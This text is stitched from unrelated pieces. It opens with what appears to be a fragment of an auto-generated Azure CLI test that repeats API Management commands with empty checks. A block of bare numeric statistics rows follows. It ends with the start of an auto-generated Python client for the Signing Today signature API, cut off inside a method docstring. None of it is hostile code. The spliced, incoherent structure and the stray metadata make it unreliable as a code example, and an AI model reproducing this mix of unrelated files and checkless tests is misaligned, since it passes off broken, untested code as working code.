self.cmd('apim policy show --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting signin create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signin create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting signin update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signin update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# get -- show
self.cmd('apim portalsetting signin show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting signin show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting signup create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signup create --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting signup update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
self.cmd('apim portalsetting signup update --resource-group "rg1" --name "apimService1" --enabled true', checks=[
])
# get -- show
self.cmd('apim portalsetting signup show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting signup show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim portalsetting delegation create --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
self.cmd('apim portalsetting delegation create --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
# create_or_update -- update
self.cmd('apim portalsetting delegation update --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
self.cmd('apim portalsetting delegation update --resource-group "rg1" --name "apimService1" --url "http://contoso.com/delegation" --validation-key "nVF7aKIvr9mV/RM5lOD0sYoi8ThXTRHQP7o66hvUmjCDkPKR3qxPu/otJcNciz2aQdqPuzJH3ECG4TU2yZjQ7Q=="', checks=[
])
# get -- show
self.cmd('apim portalsetting delegation show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim portalsetting delegation show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- update
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --display-name "Test Template ProductName 4"', checks=[
])
self.cmd('apim product update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# delete -- delete
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# list_by_tags -- list
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim product list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product api create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# create_or_update -- update
self.cmd('apim product api update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# delete -- delete
self.cmd('apim product api delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
self.cmd('apim product api delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --api-id "echo-api"', checks=[
])
# list_by_product -- list
self.cmd('apim product api list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product api list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product group create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# create_or_update -- update
self.cmd('apim product group update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# delete -- delete
self.cmd('apim product group delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
self.cmd('apim product group delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --group-id "templateGroup"', checks=[
])
# list_by_product -- list
self.cmd('apim product group list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
self.cmd('apim product group list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# create_or_update -- create
self.cmd('apim product policy create --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <rate-limit calls=\"{{call-count}}\" renewal-period=\"15\"></rate-limit>\r\n <log-to-eventhub logger-id=\"16\">\r\n @( string.Join(\",\", DateTime.UtcNow, context.Deployment.ServiceName, context.RequestId, context.Request.IpAddress, context.Operation.Name) ) \r\n </log-to-eventhub>\r\n <quota-by-key calls=\"40\" counter-key=\"cc\" renewal-period=\"3600\" increment-count=\"@(context.Request.Method == "POST" ? 1:2)\" />\r\n <base />\r\n </inbound>\r\n <backend>\r\n <base />\r\n </backend>\r\n <outbound>\r\n <base />\r\n </outbound>\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim product policy create --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim product policy update --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --value "<policies>\r\n <inbound>\r\n <rate-limit calls=\"{{call-count}}\" renewal-period=\"15\"></rate-limit>\r\n <log-to-eventhub logger-id=\"16\">\r\n @( string.Join(\",\", DateTime.UtcNow, context.Deployment.ServiceName, context.RequestId, context.Request.IpAddress, context.Operation.Name) ) \r\n </log-to-eventhub>\r\n <quota-by-key calls=\"40\" counter-key=\"cc\" renewal-period=\"3600\" increment-count=\"@(context.Request.Method == "POST" ? 1:2)\" />\r\n <base />\r\n </inbound>\r\n <backend>\r\n <base />\r\n </backend>\r\n <outbound>\r\n <base />\r\n </outbound>\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim product policy update --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim product policy delete --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy"', checks=[
])
self.cmd('apim product policy delete --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# list_by_product -- list
self.cmd('apim product policy list --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801"', checks=[
])
self.cmd('apim product policy list --resource-group "rg1" --service-name "apimService1" --product-id "testproduct"', checks=[
])
# get -- show
self.cmd('apim product policy show --resource-group "rg1" --service-name "apimService1" --product-id "5702e97e5157a50f48dce801" --policy-id "policy" --format "xml"', checks=[
])
self.cmd('apim product policy show --resource-group "rg1" --service-name "apimService1" --product-id "testproduct" --policy-id "policy"', checks=[
])
# create_or_update -- create
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true --display-name "prop3name" --value "propValue"', checks=[
])
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true', checks=[
])
self.cmd('apim property create --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# create_or_update -- update
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true --display-name "prop3name" --value "propValue"', checks=[
])
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2" --secret true', checks=[
])
self.cmd('apim property update --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# delete -- delete
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property delete --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# list_by_service -- list
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim property list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
self.cmd('apim property show --resource-group "rg1" --service-name "apimService1" --prop-id "testprop2"', checks=[
])
# create_or_update -- create
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub" --owner-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}" --scope "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/products/{{ product_name }}" --display-name "testsub"', checks=[
])
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub" --display-name "testsub"', checks=[
])
self.cmd('apim subscription create --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# create_or_update -- update
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub" --owner-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/users/{{ user_name }}" --scope "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/products/{{ product_name }}" --display-name "testsub"', checks=[
])
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub" --display-name "testsub"', checks=[
])
self.cmd('apim subscription update --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# delete -- delete
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription delete --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# list -- list
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim subscription list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
self.cmd('apim subscription show --resource-group "rg1" --service-name "apimService1" --sid "testsub"', checks=[
])
# create_or_update -- create
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar" --confirmation "signup"', checks=[
])
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar"', checks=[
])
self.cmd('apim user create --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# create_or_update -- update
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar" --confirmation "signup"', checks=[
])
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b" --email "foobar@outlook.com" --first-name "foo" --last-name "bar"', checks=[
])
self.cmd('apim user update --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# delete -- delete
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user delete --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
# list_by_service -- list
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim user list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
self.cmd('apim user show --resource-group "rg1" --service-name "apimService1" --user-id "5931a75ae4bbd512288c680b"', checks=[
])
| 57.230106
| 890
| 0.64042
| 12,292
| 112,915
| 5.857143
| 0.04027
| 0.109603
| 0.089686
| 0.168357
| 0.993402
| 0.993069
| 0.990361
| 0.988555
| 0.980166
| 0.969943
| 0
| 0.049465
| 0.193243
| 112,915
| 1,972
| 891
| 57.259128
| 0.740875
| 0.038808
| 0
| 0.778903
| 0
| 0.390717
| 0.759289
| 0.105144
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.005063
| 0.005063
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2b60a0c5a3d9086b7a0de9c0f04fd2cf269cdd85
| 105
|
py
|
Python
|
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | null | null | null |
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | null | null | null |
test_cloud_mask.py
|
dahcase/gee_tools
|
4aa445e3a25ef2b9dd19762dc21ef5dcc9debc04
|
[
"MIT"
] | 1
|
2022-01-13T23:39:05.000Z
|
2022-01-13T23:39:05.000Z
|
# coding=utf-8
from geetools.tests import test_cloud_mask
import unittest
unittest.main(test_cloud_mask)
| 21
| 42
| 0.847619
| 17
| 105
| 5
| 0.705882
| 0.211765
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.085714
| 105
| 5
| 43
| 21
| 0.875
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
994475f5fa56263bed07d1a12e0ef5c08bacdbb0
| 104,848
|
py
|
Python
|
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/api/bit4id_pathgroup_identities_api.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Signing Today API
*Signing Today* enables seamless integration of digital signatures into any
website by the use of easy requests to our API. This is the smart way of
adding digital signature support with a great user experience.


*Signing Today APIs* use HTTP methods and are RESTful-based; moreover, they
are protected by a *server to server authentication* standard through the use
of tokens.


*Signing Today APIs* can be used in these environments:


| Environment | Description | Endpoint |
| ----------- | ----------- | -------- |
| Sandbox     | Test environment | `https://sandbox.signingtoday.com` |
| Live        | Production environment | `https://api.signingtoday.com` |


For every single request to Signing Today the following *HTTP* header has to
be defined:
- `Authorization`, which contains the authentication token.

If the request has a body, then another *HTTP* header is required:
- `Content-Type`, with the `application/json` value.


Here follows an example of usage to enumerate all the users of the *my-org*
organization.

**Example**

```json
$ curl https://sandbox.signingtoday.com/api/v1/my-org/users \
    -H 'Authorization: Token <access-token>'
```

## HTTP methods used

APIs use the right HTTP verb in every situation.

| Method   | Description                    |
| -------- | ------------------------------ |
| `GET`    | Request data from a resource   |
| `POST`   | Send data to create a resource |
| `PUT`    | Update a resource              |
| `PATCH`  | Partially update a resource    |
| `DELETE` | Delete a resource              |


## Response definition

All the responses are in JSON format.
As a response to a request for all the users of an organization you will get a
result like this:

```json
{
    "pagination": {
      "count": 75,
      "previous": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=1",
      "next": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=3",
      "pages": 8,
      "page": 2
    },
    "meta": {
      "code": 200
    },
    "data": [
      {
        "id": "jdo",
        "status": "enabled",
        "type": "Basic user account",
        "email": johndoe@dummyemail.com,
        "first_name": "John",
        "last_name": "Doe",
        "wallet": [],
        "created_by": "system",
        "owner": false,
        "automatic": false,
        "rao": false
      },
      ...
    ]
  }
```

The JSON of the response is made of three parts:
- Pagination
- Meta
- Data

### Pagination

The *Pagination* object allows splitting the response into parts and then
rebuilding it sequentially by the use of the `next` and `previous` parameters,
through which you get the previous and following blocks. *Pagination* is
present only if the response is a list of objects.

The general structure of *Pagination* object is the following:

```json
{
    "pagination": {
      "count": 75,
      "previous": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=1",
      "next": "https://sandbox.signingtoday.com/api/v1/my-org/users?page=3",
      "pages": 8,
      "page": 2
    },
    ...
  }
```
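
As an illustrative sketch only (assuming the third-party `requests` package
and a valid token), a whole listing can be rebuilt by following `next` until
no further page is available:

```python
import requests

def fetch_all(url, token):
    # Walk a paginated listing by following the "next" links.
    items = []
    while url:
        page = requests.get(url, headers={"Authorization": "Token " + token}).json()
        items.extend(page["data"])
        # "next" is assumed to be empty/absent on the last page.
        url = page.get("pagination", {}).get("next")
    return items
```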

### Meta

The *Meta* object is used to enrich the information about the response. In the
previous example, a successful response, *Meta* will have the value
`status: 2XX`. In case of an unsuccessful response, *Meta* will carry further
information, as follows:

```json
{
    "meta": {
      "code": <HTTP STATUS CODE>,
      "error_type": <STATUS CODE DESCRIPTION>,
      "error_message": <ERROR DESCRIPTION>
    }
  }
```

### Data

The *Data* object is returned as a single object or a list of objects. It
contains the expected data as requested from the API.

## Search filters

Search filters of the API have the following structure:

`where_ATTRIBUTENAME`=`VALUE`

In this way you make a case-sensitive search for *VALUE*. You can extend it
through Django lookups, obtaining more specific filters. For example:

`where_ATTRIBUTENAME__LOOKUP`=`VALUE`

where *LOOKUP* can be replaced with `icontains` to perform a partial,
case-insensitive search, so that

`where_first_name__icontains`=`CHa`

matches every user that has the *cha* string in their name, with
no distinction between upper and lower case.

[Here](https://docs.djangoproject.com/en/1.11/ref/models/querysets/#field-lookups)
you can find the list of the lookups.
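
As an illustrative sketch only (again assuming the `requests` package), such a
filter can be passed as a query parameter of the listing request:

```python
import requests

# Case-insensitive partial match on first_name (illustrative values).
response = requests.get(
    "https://sandbox.signingtoday.com/api/v1/my-org/users",
    params={"where_first_name__icontains": "CHa"},
    headers={"Authorization": "Token <access-token>"},
)
print(response.json()["data"])
```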

## Webhooks

Signing Today supports webhooks for updates of DST and identity status.
You can choose whether or not to use webhooks and whether you want to receive
updates about DSTs and/or identities. You can configure this at the application
token level, in the *webhook* field, as follows:

```json
"webhooks": {
  "dst": "URL",
  "identity": "URL"
  }
```

### DSTs status update

DSTs send the following status updates:
- **DST_STATUS_CHANGED**: whenever the DST changes its status
- **SIGNATURE_STATUS_CHANGED**: whenever one of the signatures changes its
status

#### DST_STATUS_CHANGED

Sends the following information:

```json
{
    "message": "DST_STATUS_CHANGED",
    "data": {
      "status": "<DST_STATUS>",
      "dst": "<DST_ID>",
      "reason": "<DST_REASON>"
    }
  }
```

#### SIGNATURE_STATUS_CHANGED

Sends the following information:

```json
{
    "message": "SIGNATURE_STATUS_CHANGED",
    "data": {
      "status": "<SIGNATURE_STATUS>",
      "group": <MEMBERSHIP_GROUP_INDEX>,
      "dst": {
        "id": "<DST_ID>",
        "title": "<DST_TITLE>"
      },
      "signature": "<SIGNATURE_ID>",
      "signer": "<SIGNER_USERNAME>",
      "position": "<SIGNATURE_POSITION>",
      "document": {
        "display_name": "<DOCUMENT_TITLE>",
        "id": "<DOCUMENT_ID>",
        "order": <DOCUMENT_INDEX>
      },
      "automatic": <DECLARES_IF_THE_SIGNER_IS_AUTOMATIC>,
      "page": "<SIGNATURE_PAGE>"
    }
  }
```

### Identities status update

Identities send the following status updates:
- **IDENTITY_REQUEST_ENROLLED**: whenever an identity request is activated

#### IDENTITY_REQUEST_ENROLLED

Sends the following information:

```json
{
    "message": "IDENTITY_REQUEST_ENROLLED",
    "data": {
      "status": "<REQUEST_STATUS>",
      "request": "<REQUEST_ID>",
      "user": "<APPLICANT_USERNAME>"
    }
  }
```
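
As an illustrative sketch only, a receiver can dispatch on the `message`
field of the payloads shown above:

```python
import json

def handle_webhook(raw_body):
    # Dispatch on the "message" field of an incoming webhook payload.
    payload = json.loads(raw_body)
    message = payload.get("message")
    data = payload.get("data", {})
    if message == "DST_STATUS_CHANGED":
        print("DST", data.get("dst"), "is now", data.get("status"))
    elif message == "SIGNATURE_STATUS_CHANGED":
        print("signature", data.get("signature"), "is now", data.get("status"))
    elif message == "IDENTITY_REQUEST_ENROLLED":
        print("identity request", data.get("request"), "enrolled for", data.get("user"))
```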

### Urlback

Sometimes it may be necessary to perform a redirect after a user, from the
signature tray, has completed their operations or activated a certificate.

If set, redirects could happen in 3 cases:
- after a signature or decline
- after a DST has been signed by all the signers or canceled
- after the activation of a certificate

In the first two cases the urlback returns the following information through
a data form:
- **dst-id**: id of the DST
- **dst-url**: signature_ticket of the signature
- **dst-status**: current status of the DST
- **dst-signature-id**: id of the signature
- **dst-signature-status**: current status of the signature
- **user**: username of the signer
- **decline-reason**: in case of a refused DST, contains the reason for the
decline

In the last case the urlback returns the following information through a
data form:
- **user**: username of the user who activated the certificate
- **identity-provider**: the provider that has been used to issue the certificate
- **identity-request-id**: id of the enrollment request
- **identity-id**: id of the new identity
- **identity-label**: the label assigned to the identity
- **identity-certificate**: public key of the certificate


 # noqa: E501
The version of the OpenAPI document: 1.5.0
Contact: smartcloud@bit4id.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from signing_today_client.api_client import ApiClient
from signing_today_client.exceptions import (
ApiTypeError,
ApiValueError
)
class Bit4idPathgroupIdentitiesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def associate_appearance(self, organization_id, identity_id, inline_object, **kwargs): # noqa: E501
"""Associate an appearance to an identity # noqa: E501
Associate a signature appearance to an already existing identity through a URL to an image. This appearance will be displayed on the document after the signature. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_appearance(organization_id, identity_id, inline_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param InlineObject inline_object: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.associate_appearance_with_http_info(organization_id, identity_id, inline_object, **kwargs) # noqa: E501
def associate_appearance_with_http_info(self, organization_id, identity_id, inline_object, **kwargs): # noqa: E501
"""Associate an appearance to an identity # noqa: E501
Associate a signature appearance to an already existing identity through a URL to an image. This appearance will be displayed on the document after the signature. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_appearance_with_http_info(organization_id, identity_id, inline_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param InlineObject inline_object: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id', 'inline_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_appearance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `associate_appearance`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `associate_appearance`") # noqa: E501
# verify the required parameter 'inline_object' is set
if ('inline_object' not in local_var_params or
local_var_params['inline_object'] is None):
raise ApiValueError("Missing the required parameter `inline_object` when calling `associate_appearance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'inline_object' in local_var_params:
body_params = local_var_params['inline_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}/appearance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def associate_identity(self, organization_id, user_id, identity_association, **kwargs): # noqa: E501
"""Associate to an user an already existing identity # noqa: E501
